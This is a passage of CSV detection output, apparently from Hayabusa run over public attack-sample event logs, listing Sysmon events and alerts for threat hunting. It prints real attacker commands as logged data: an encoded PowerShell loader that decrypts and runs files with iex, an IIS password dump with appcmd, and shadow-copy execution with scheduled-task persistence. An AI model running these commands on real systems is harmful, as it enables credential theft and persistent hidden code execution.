JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx
